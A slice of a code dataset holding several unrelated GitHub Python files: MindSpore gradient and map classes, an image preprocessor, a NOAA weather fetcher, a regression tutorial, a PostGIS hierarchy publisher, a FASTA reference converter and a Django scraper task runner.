f\"but got {type(sens_param).__name__}\")\n if not isinstance(has_aux, bool):\n raise TypeError(f\"For '_Grad', the 'has_aux' should be bool, \"\n f\"but got {type(has_aux).__name__}\")\n if not isinstance(get_value, bool):\n raise TypeError(f\"For '_Grad', the 'get_value' should be bool, \"\n f\"but got {type(get_value).__name__}\")\n if not isinstance(return_ids, bool):\n raise TypeError(f\"For '_Grad', the 'return_ids' should be bool, \"\n f\"but got {type(return_ids).__name__}\")\n self.get_by_position = get_by_position\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n self.has_aux = has_aux\n self.get_value = get_value\n self.return_ids = return_ids\n GradOperation_.__init__(self, 'grad', False, get_by_list, sens_param, get_by_position, has_aux, get_value,\n return_ids)\n self.grad_fn = None\n self.fn = None\n self.pynative_ = False\n self.grad_position = None\n self.weights_id = None\n\n def __call__(self, fn, weights=None, grad_position=0):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.grad_position == grad_position and \\\n self.weights_id == weights_id:\n return self.grad_fn\n\n def aux_fn(*args):\n outputs = fn(*args)\n if not isinstance(outputs, tuple) or len(outputs) < 2:\n raise ValueError(\"When has_aux is True, origin fn requires more than one outputs.\")\n res = (outputs[0],)\n stop_gradient = Primitive(\"StopGradient\")\n for item in outputs[1:]:\n res += (stop_gradient(item),)\n return res\n\n grad_ = _Grad(self.get_by_list, self.sens_param, self.get_by_position, self.has_aux, self.get_value,\n self.return_ids)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n if self.get_by_position:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn, weights, grad_position)(*args)\n else:\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def 
after_grad(*args):\n return grad_(fn, weights)(*args)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn)(*args)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n res = self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n if self.return_ids and out:\n out = _combine_with_ids(grad_position, weights, out)\n if self.get_value:\n return res, out\n if self.has_aux:\n return out, res[1:]\n return out\n else:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n grad_.pynative_ = True\n fn_ = fn\n if self.has_aux:\n fn_ = aux_fn\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_position:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights, grad_position)(*args, **kwargs)\n else:\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n return grad_(fn_)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.grad_position = grad_position\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward runs to build grad graph. \"\"\"\n new_kwargs = kwargs\n outputs = ()\n if self.sens_param:\n if 'sens' in kwargs.keys():\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n else:\n args = args[:-1]\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n outputs = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, outputs, *args, **new_kwargs)\n return outputs\n else:\n # Check if fn has run already.\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n fn.set_grad()\n outputs = fn(*args, **new_kwargs)\n fn.set_grad(False)\n return outputs\n if (self.get_value or self.has_aux) and not outputs:\n outputs = fn(*args, **new_kwargs)\n return outputs\n\n\nclass _Vmap(VmapOperation_):\n \"\"\"\n A higher-order function which is used to generate the vectorizing map function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize _Vmap.\"\"\"\n VmapOperation_.__init__(self, 'vmap')\n self.vmap_fn = None\n self.fn = None\n self.in_axes = None\n self.out_axes = None\n\n def __call__(self, fn, in_axes=0, out_axes=0):\n if self.vmap_fn is not None and self.fn == fn and self.in_axes == in_axes and self.out_axes == out_axes:\n return self.vmap_fn\n\n vmap_ = self\n\n @jit\n def after_vmap(*args, **kwargs):\n return vmap_(fn, in_axes, out_axes)(*args, **kwargs)\n\n self.vmap_fn = after_vmap\n self.fn = fn\n self.in_axes = in_axes\n self.out_axes = out_axes\n return self.vmap_fn\n\n\nclass MultitypeFuncGraph(MultitypeFuncGraph_):\n \"\"\"\n MultitypeFuncGraph is a class used to generate overloaded functions, considering different types as inputs.\n Initialize an `MultitypeFuncGraph` object with name, and use `register` with input types as the decorator\n for the function to be registered. 
And the object can be called with different types of inputs,\n and work with `HyperMap` and `Map`.\n\n Args:\n name (str): Operator name.\n read_value (bool, optional): If the registered function do not need to set value on Parameter,\n and all inputs will pass by value, set `read_value` to ``True`` . Default: ``False`` .\n\n Raises:\n ValueError: If failed to find a matching function for the given arguments.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> # `add` is a metagraph object which will add two objects according to\n >>> # input type using \".register\" decorator.\n >>> from mindspore import Tensor\n >>> from mindspore import ops\n >>> from mindspore import dtype as mstype\n >>> import mindspore.ops as ops\n >>>\n >>> tensor_add = ops.Add()\n >>> add = ops.MultitypeFuncGraph('add')\n >>> @add.register(\"Number\", \"Number\")\n ... def add_scala(x, y):\n ... return x + y\n >>> @add.register(\"Tensor\", \"Tensor\")\n ... def add_tensor(x, y):\n ... return tensor_add(x, y)\n >>> output = add(1, 2)\n >>> print(output)\n 3\n >>> output = add(Tensor([0.1, 0.6, 1.2], dtype=mstype.float32), Tensor([0.1, 0.6, 1.2], dtype=mstype.float32))\n >>> print(output)\n [0.2 1.2 2.4]\n \"\"\"\n\n def __init__(self, name, read_value=False, need_raise=False):\n \"\"\"Initialize MultitypeFuncGraph.\"\"\"\n MultitypeFuncGraph_.__init__(self, name, need_raise)\n self.entries = list()\n if read_value:\n self.set_signatures((\n sig.make_sig('args', sig.sig_rw.RW_READ, sig.sig_kind.KIND_VAR_POSITIONAL),))\n\n def __call__(self, *args):\n if len(self.entries) == 1:\n output = self.entries[0][1](*args)\n return output\n types = tuple(map(mstype.get_py_obj_dtype, args))\n for sigs, fn in self.entries:\n if len(sigs) != len(types):\n continue\n if any(not mstype._issubclass_(type_, sig) for sig, type_ in zip(sigs, types)): # pylint: disable=W0212\n continue\n output = fn(*args)\n return output\n raise ValueError(f\"For 'MultitypeFuncGraph', cannot find fn match given args. Got (sigs, fn): {self.entries}, \"\n f\"and (dtype, args): {types}.\")\n\n def register(self, *type_names):\n \"\"\"\n Register a function for the given type string.\n\n Args:\n type_names (Union[str, :class:`mindspore.dtype`]): Inputs type names or types list.\n\n Return:\n decorator, a decorator to register the function to run, when called under the\n types described in `type_names`.\n \"\"\"\n\n def deco(fn):\n def convert_type(type_input):\n if isinstance(type_input, str):\n return mstype.typing.str_to_type(type_input)\n if not isinstance(type_input, mstype.Type):\n raise TypeError(f\"For 'MultitypeFuncGraph', register only support str or {mstype.Type}, but got \"\n f\"'type_input': {type_input}.\")\n return type_input\n\n types = tuple(map(convert_type, type_names))\n self.register_fn(type_names, fn)\n self.entries.append((types, fn))\n return fn\n\n return deco\n\n # pylint: disable=missing-docstring\n def set_doc_url(self, doc_url):\n self.set_doc_url_(doc_url)\n\n\nclass HyperMap(HyperMap_):\n \"\"\"\n Hypermap will apply the set operation to input sequences.\n\n Apply the operations to every element of the sequence or nested sequence. Different\n from `mindspore.ops.Map`, the `HyperMap` supports to apply on nested structure.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. 
Default is None.\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is False.\n\n Inputs:\n - **args** (Tuple[sequence]) -\n\n - If `ops` is not `None`, all the inputs should be sequences with the same length.\n And each row of the sequences will be the inputs of the operation.\n - If `ops` is `None`, the first input is the operation, and the others are inputs.\n\n Note:\n Except for the operation input, the number of inputs should be equal to the number of inputs to `ops`.\n\n Outputs:\n Sequence or nested sequence, the sequence of output after applying the function.\n e.g. `operation(args[0][i], args[1][i])`.\n\n Raises:\n TypeError: If `ops` is neither MultitypeFuncGraph nor None.\n TypeError: If `args` is not a Tuple.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> from mindspore import Tensor, ops\n >>> from mindspore import dtype as mstype\n >>> nest_tensor_list = ((Tensor(1, mstype.float32), Tensor(2, mstype.float32)),\n ... (Tensor(3, mstype.float32), Tensor(4, mstype.float32)))\n >>> # square all the tensor in the nested list\n >>>\n >>> square = ops.MultitypeFuncGraph('square')\n >>> @square.register(\"Tensor\")\n ... def square_tensor(x):\n ... return ops.square(x)\n >>>\n >>> common_map = ops.HyperMap()\n >>> output = common_map(square, nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n >>> square_map = ops.HyperMap(square, False)\n >>> output = square_map(nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n \"\"\"\n\n def __init__(self, ops=None, reverse=False):\n \"\"\"Initialize HyperMap.\"\"\"\n self.ops = ops\n if ops:\n HyperMap_.__init__(self, reverse, ops)\n else:\n HyperMap_.__init__(self, reverse)\n\n def __call__(self, *args):\n func = self.ops\n args_list = args\n hypermap = self\n if self.ops is None:\n func = args[0]\n args_list = args[1:]\n hypermap = partial(self, func)\n # is leaf\n if not isinstance(args_list[0], (tuple, list)):\n return func(*args_list)\n return tuple(map(hypermap, *args_list))\n\n\nclass Map(Map_):\n \"\"\"\n Map will apply the set operation on input sequences.\n\n Apply the operations to every element of the sequence.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. Default: ``None`` .\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `Reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is ``False`` .\n\n Inputs:\n - **args** (Tuple[sequence]) - If `ops` is not `None`, all the inputs should be the same length sequences,\n and each row of the sequences. e.g. 
If the length of args is 2, and for `i` in length of each sequence\n            `(args[0][i], args[1][i])` will be the input of the operation.\n\n            If `ops` is `None`, the first input is the operation, and the other is inputs.\n\n    Outputs:\n        Sequence, the sequence of output after applying the function. e.g. `operation(args[0][i], args[1][i])`.\n\n    Supported Platforms:\n        ``Ascend`` ``GPU`` ``CPU``\n\n    Examples:\n        >>> from mindspore import dtype as mstype\n        >>> from mindspore import Tensor, ops\n        >>> from mindspore.ops import MultitypeFuncGraph, Map\n        >>> tensor_list = (Tensor(1, mstype.float32), Tensor(2, mstype.float32), Tensor(3, mstype.float32))\n        >>> # square all the tensor in the list\n        >>>\n        >>> square = MultitypeFuncGraph('square')\n        >>> @square.register(\"Tensor\")\n        ... def square_tensor(x):\n        ...     return ops.square(x)\n        >>>\n        >>> common_map = Map()\n        >>> output = common_map(square, tensor_list)\n        >>> print(output)\n        (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n        Tensor(shape=[], dtype=Float32, value= 9))\n        >>> square_map = Map(square, False)\n        >>> output = square_map(tensor_list)\n        >>> print(output)\n        (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n        Tensor(shape=[], dtype=Float32, value= 9))\n    \"\"\"\n\n    def __init__(self, ops=None, reverse=False):\n        \"\"\"Initialize Map.\"\"\"\n        self.ops = ops\n        if ops:\n            Map_.__init__(self, reverse, ops)\n        else:\n            Map_.__init__(self, reverse)\n\n    def __call__(self, *args):\n        func = self.ops\n        args_list = args\n        if self.ops is None:\n            func = args[0]\n            args_list = args[1:]\n        return tuple(map(func, *args_list))\n\n\nclass _ListAppend(ListAppend_):\n    \"\"\"\n    A metafuncgraph class that append one element to list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListAppend.\"\"\"\n        ListAppend_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_append = _ListAppend(\"append\")\n\n\nclass _ListInsert(ListInsert_):\n    \"\"\"\n    A metafuncgraph class that insert one element to list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListInsert.\"\"\"\n        ListInsert_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_insert = _ListInsert(\"insert\")\n\n\nclass _ListPop(ListPop_):\n    \"\"\"\n    A metafuncgraph class that pop one element from list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListPop.\"\"\"\n        ListPop_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_pop = _ListPop(\"pop\")\n\n\nclass _ListClear(ListClear_):\n    \"\"\"\n    A metafuncgraph class that clear the list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListClear.\"\"\"\n        ListClear_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_list_clear = _ListClear(\"clear\")\n\n\nclass _ListReverse(ListReverse_):\n    \"\"\"\n    A metafuncgraph class that reverse the list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListReverse.\"\"\"\n        ListReverse_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_reverse = _ListReverse(\"reverse\")\n\n\nclass _ListExtend(ListExtend_):\n    \"\"\"\n    A metafuncgraph class that append another list to the end of the list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize 
_ListExtend.\"\"\"\n ListExtend_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_extend = _ListExtend(\"extend\")\n\n\nclass _DictClear(DictClear_):\n \"\"\"\n A metafuncgraph class that clear the dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictClear.\"\"\"\n DictClear_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_dict_clear = _DictClear(\"clear\")\n\n\nclass _DictHasKey(DictHasKey_):\n \"\"\"\n A metafuncgraph class that Check if key is in dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictHasKey.\"\"\"\n DictHasKey_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_haskey = _DictHasKey(\"has_key\")\n\n\nclass _DictUpdate(DictUpdate_):\n \"\"\"\n A metafuncgraph class that append another dict to the end of the dict.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictUpdate.\"\"\"\n DictUpdate_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_update = _DictUpdate(\"update\")\n\n\nclass _DictFromKeys(DictFromKeys_):\n \"\"\"\n A metafuncgraph class that creates a new dict from the given sequence and value.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _DictFromKeys.\"\"\"\n DictFromKeys_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\n_fromkeys = _DictFromKeys(\"fromkeys\")\n\n\nclass _Tail(Tail_):\n \"\"\"\n A metafuncgraph class that generates tail elements of the tuple.\n\n Args:\n name (str): The name of the metafuncgraph object.\n \"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _Tail.\"\"\"\n Tail_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\ntail = _Tail('tail')\n\n\nclass _ZipOperation(ZipOperation_):\n \"\"\"Generates a tuple of zip iterations for inputs.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize _ZipOperation.\"\"\"\n ZipOperation_.__init__(self, name)\n\n def __call__(self, *args):\n pass\n\n\nzip_operation = _ZipOperation('zip_operation')\n\"\"\"`zip_operation` will generate a tuple of zip iterations of inputs.\"\"\"\n","repo_name":"mindspore-ai/mindspore","sub_path":"mindspore/python/mindspore/ops/composite/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":44723,"program_lang":"python","lang":"en","doc_type":"code","stars":3831,"dataset":"github-code","pt":"39"}
+{"seq_id":"28592621532","text":"\n'''Created on 4/12/23 by Cristian Finley\n last updated: 4/17/23 '''\n\n#############JPEG to RGB Pre-processing#################\nfrom PIL import Image\nimport numpy as np\n\n'''Turns a JPEG image into an image with width = 400 px and height = 400 px unless otherwise specified\ninputs: \n filename - image file compatible with pillo\n width(optional) - desired image array width\n height(optional) - desired image array height\nreturns:\n matrix of RGB px values'''\ndef preprocessImage (filename,width=400,height=400):\n im = Image.open(filename)\n width = 400\n height = 400\n \n if im.size[0] > width:\n im = im.crop((((im.size[0]-width)/2),0,(im.size[0]-(im.size[0]-width)/2),im.size[1]))\n if im.size[1] > height:\n im = im.crop((0,((im.size[1]-height)/2),im.size[0],(im.size[1]-(im.size[1]-height)/2)))\n im_matrix = np.array(im)\n print(im_matrix.size)\n im.close()\n return im_matrix\n \n\n#Random PILLOW commands\n#im.show()\n#print(im.format)\n#print(im.mode)\n#print(im.size)\n#print(im.width, im.height)\n#print(im.info)\n#left, upper, right, lower\n#cropped.show()\n#save the cropped image\n#cropped.save('images/croppedBeach1.jpg')","repo_name":"cfinley569/Spermatid-Image-Analysis","sub_path":"ImagePreprocessing.py","file_name":"ImagePreprocessing.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"34498180371","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 12 10:41:12 2022\r\n\r\n@authors: Moin, Gargi, Rishabh\r\n\"\"\"\r\nimport urllib.request\r\nimport math\r\n\r\n\r\ndef line_averages(filename):\r\n with open(filename, 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n s = 0.0\r\n for elem in line.split(','):\r\n s = s + int(elem)\r\n avg = s/len(line.split(','))\r\n print(avg)\r\n\r\n\r\ndef noaa_string():\r\n \"\"\"Fetch from the Internet and return the current NOAA METAR\r\n weather observation data for EDDH (Hamburg Airport) as a string.\r\n \"\"\"\r\n url = \"http://tgftp.nws.noaa.gov/data/observations/metar/decoded/EDDH.TXT\"\r\n noaa_data_string = urllib.request.urlopen(url).read()\r\n return noaa_data_string.decode(\"utf-8\")\r\n\r\n\r\ndef noaa_temperature(s):\r\n y = []\r\n for elem in range(len(s)):\r\n y = s.split()\r\n for t in y:\r\n if t == \"Temperature:\":\r\n x = y.index(t)+1\r\n print(y[x])\r\n d = (int(y[x])-32)*(5/9)\r\n return math.ceil(d)\r\n","repo_name":"rishabhmoolya/MPSD_Workshop","sub_path":"training4.py","file_name":"training4.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"35226885082","text":"#Simple regression\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 23:49:15 2018\n\n@author: karta\n\"\"\"\n#importing libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing datasets\ndataset = pd.read_csv(\"Salary_Data.csv\")\n\nx = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,1].values\n\n#Spliting the data into training and test set\nfrom sklearn.cross_validation import train_test_split\nx_train,x_test,y_train,y_test = train_test_split(x,y,test_size = 1/3, random_state = 0)\n\n#Training the simple regression model\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(x_train,y_train)\n\n#Askinf the model to predict the test results\ny_pred = regressor.predict(x_test)\n\n# Visulalising the training set results\nplt.scatter(x_train, y_train, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Training set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")\n\n# Visulalising the test set results\nplt.scatter(x_test, y_test, color='red')\nplt.plot(x_train, regressor.predict(x_train))\nplt.title(\"Salary vs Experience (Test set)\")\nplt.xlabel('Experience')\nplt.ylabel(\"Salary\")","repo_name":"KartavyaKothari/Machine-learning-learning","sub_path":"Part 2 - Regression/Section 4 - Simple Linear Regression/simple_LR.py","file_name":"simple_LR.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"23526084548","text":"# coding: utf-8\n\nimport pandas as pd\n\nfrom niamoto.conf import settings\nfrom niamoto.data_publishers.base_data_publisher import BaseDataPublisher\nfrom niamoto.data_marts.dimensions.vector_dimension import VectorDimension\nfrom niamoto.db.connector import Connector\nfrom niamoto.log import get_logger\n\n\nLOGGER = get_logger(__name__)\n\n\nclass VectorHierarchyPublisher(BaseDataPublisher):\n \"\"\"\n Publish vector hierarchies from the niamoto vector database.\n Produce an association table containing the identifiers of nested vectors.\n Uses the data from published vector dimensions.\n \"\"\"\n\n @classmethod\n def get_key(cls):\n return 'vector_hierarchy'\n\n @classmethod\n def get_description(cls):\n return \"Publish a vector hierarchy from the niamoto vector database.\"\n\n @classmethod\n def get_publish_formats(cls):\n return []\n\n def _process(self, vector_names, *args, buffer_size=0.001, **kwargs):\n \"\"\"\n :param vector_names: List of the vector names for the hierarchy.\n Ordering is important, the first element corresponds to the\n highest level of the hierarchy while the last element corresponds\n to the smallest level of the hierarchy.\n :return: A GeoDataFrame corresponding to the vector to publish.\n \"\"\"\n level_ids = ','.join(\n [\"{}.id AS {}_id\".format(v, v) for v in vector_names]\n )\n where_clause = \"WHERE \" + \" AND \".join(\n [\"{}.id IS NOT NULL\".format(v) for v in vector_names]\n )\n highest_level = vector_names.pop(0)\n dim_tables = \"{schema}.{tb} AS {tb}\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': highest_level,\n })\n previous_level = highest_level\n previous_geom = VectorDimension(highest_level).geom_col[0]\n for level in vector_names:\n geom = VectorDimension(level).geom_col[0]\n dim_tables += \\\n \"\"\"\n LEFT JOIN {schema}.{tb} AS {tb}\n ON ST_Within(\n ST_Buffer({tb}.{geom}, -{buffer}),\n {prev_tb}.{prev_geom}\n )\n \"\"\".format(**{\n 'schema': settings.NIAMOTO_DIMENSIONS_SCHEMA,\n 'tb': level,\n 'prev_tb': previous_level,\n 'geom': geom,\n 'prev_geom': previous_geom,\n 'buffer': buffer_size,\n })\n previous_level = level\n previous_geom = geom\n sql = \\\n \"\"\"\n SELECT {level_ids}\n FROM {dim_tables}\n {where_clause};\n \"\"\".format(\n **{\n 'level_ids': level_ids,\n 'dim_tables': dim_tables,\n 'where_clause': where_clause,\n }\n )\n with Connector.get_connection() as connection:\n df = pd.read_sql(sql, connection)\n return df\n","repo_name":"niamoto/niamoto-core","sub_path":"niamoto/data_publishers/vector_hierarchy_publisher.py","file_name":"vector_hierarchy_publisher.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"8873877812","text":"\"\"\"A simple wrapper for run_bam_to_fasta\nin pbcoretools.tasks.converters\n\"\"\"\nfrom __future__ import absolute_import\nfrom ..sys import system\n#from pbcoretools.tasks.converters import run_fasta_to_reference, run_fasta_to_referenceset\nfrom pbcore.io import (ContigSet, ReferenceSet)\nimport argparse\nimport logging\nimport sys\nimport os.path as op\n\nlog = logging.getLogger(__name__)\n\ndef run_fasta_to_referenceset(input_file_name, output_file_name, prog):\n \"\"\"Copied from pbsmrtpipe/pb_tasks/pacbio.py:run_fasta_to_referenceset()\n \"\"\"\n args = ['dataset', \"create\", \"--type ReferenceSet\", \"--generateIndices\",\n output_file_name, input_file_name]\n system(\" \".join(args))\n\ndef run_fasta_to_reference(input_file_name, output_file_name,\n organism, reference_name,\n ploidy):\n \"\"\"Copied from pbcoretools/tasks/converters.py:run_fasta_to_reference()\n \"\"\"\n ds_in = ContigSet(input_file_name)\n if len(ds_in.externalResources) > 1:\n raise TypeError(\"Only a single FASTA file is supported as input.\")\n fasta_file_name = ds_in.externalResources[0].resourceId\n output_dir_name = op.dirname(output_file_name)\n args = [\n \"fasta-to-reference\",\n \"--organism\", organism,\n \"--ploidy\", ploidy,\n \"--debug\",\n fasta_file_name,\n output_dir_name,\n reference_name\n ]\n log.info(\" \".join(args))\n system(\" \".join(args))\n ref_file = op.join(output_dir_name, reference_name, \"referenceset.xml\")\n assert op.isfile(ref_file)\n with ReferenceSet(ref_file, strict=True) as ds_ref:\n ds_ref.makePathsAbsolute()\n log.info(\"saving final ReferenceSet to {f!r}\".format(f=output_file_name))\n ds_ref.write(output_file_name)\n\ndef run(fasta, ref):\n try:\n # This uses Python + BAM library.\n run_fasta_to_referenceset(fasta, ref, 'dataset')\n return\n except Exception:\n log.exception('We will try another someting else.')\n\n try:\n # This uses Python + BAM library.\n # the '.py' name difference will be resolved in pbdataset/pbcoretools, but\n # for now, work with either\n run_fasta_to_referenceset(fasta, ref, 'dataset.py')\n return\n except Exception:\n log.exception('We will try someting else.')\n raise\n\n try:\n # This uses pbscala and also runs sawriter.\n reference_name = op.splitext(op.basename(fasta))[0]\n organism = \"unknown\"\n ploidy = \"haploid\"\n run_fasta_to_reference(fasta, ref, organism=organism, reference_name=reference_name, ploidy=ploidy)\n except Exception:\n log.exception('Out of ideas.')\n raise\n\n\ndef main(argv=sys.argv):\n description = \"\"\"Create referenceset XML from fasta.\n\"\"\"\n epilog = \"\"\"\nThere might extra files too. 
We use fasta-to-reference (from pbscala)\nif available (which would also run sawriter).\nOtherwise, we use 'dataset create'.\nThe fasta might be copied, and the dataset should refer to it absolutely (I think).\n\"\"\"\n    parser = argparse.ArgumentParser(\n        description=description,\n        epilog=epilog,\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    #parser.add_argument('--logging',\n    #    help='.ini or .json config file for Python logging module')\n    parser.add_argument('fasta',\n        help='Input fasta filename.')\n    parser.add_argument('ref',\n        help='Output referenceset XML filename.')\n    args = parser.parse_args(argv[1:])\n    log.info('RUNNING run_fasta2reference: {}'.format(repr(args)))\n    run(**vars(args))\n\nif __name__ == \"__main__\":\n    logging.basicConfig()\n    logging.getLogger().setLevel(logging.DEBUG)\n    main(sys.argv)\n","repo_name":"lpp1985/lpp_Script","sub_path":"pacbiolib/pacbio/pythonpkgs/falconpolish/lib/python2.7/site-packages/falcon_polish/mains/run_fasta2referenceset.py","file_name":"run_fasta2referenceset.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"}
+{"seq_id":"16218855564","text":"import sys\nimport django\nimport os\nimport pathlib\nimport js2py\nimport threading\nfrom django_redis import get_redis_connection\nif __name__ == \"__main__\":\n basedir = str(pathlib.Path(__file__).resolve().parent.parent)\n os.chdir(basedir)\n sys.path.append(basedir)\n os.environ['DJANGO_SETTINGS_MODULE'] = 'soyoung.settings'\n django.setup()\n\nfrom grab.createsession import createsession\nfrom grab.models import Product, Hospital, Reviewer,Diary,Doctor\nimport datetime, time\nimport re, json\nimport psutil\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom dotmap import DotMap\nfrom bs4 import BeautifulSoup\nimport sys\ndef beforecheck(name):\n pidfile = f'{name}.pid'\n if os.path.exists(os.path.join(settings.BASE_DIR, 'run', pidfile)):\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'r') as f:\n pid = int(f.read())\n try:\n p = psutil.Process(pid)\n exit(0)\n except Exception as e:\n print(e)\n with open(os.path.join(settings.BASE_DIR, 'run', pidfile), 'w') as f:\n f.write(str(os.getpid()))\n\nfrom grab.checkuser import checkproduct,checkproductdiary,checkdiary,checkdiaryreply,checkhospital,checkdoctor,checkuser,checkdoctordiary,checkdoctorxiangmu\n\ndef task_checkdiary():\n con = get_redis_connection('default')\n beforecheck('task_checkdiary')\n while 1:\n arr=con.zrange('diary_list',0,3)\n ath=[threading.Thread(target=checkdiary,args=(did.decode(),)) for did in arr]\n [th.start() for th in ath]\n [th.join() for th in ath]\n # 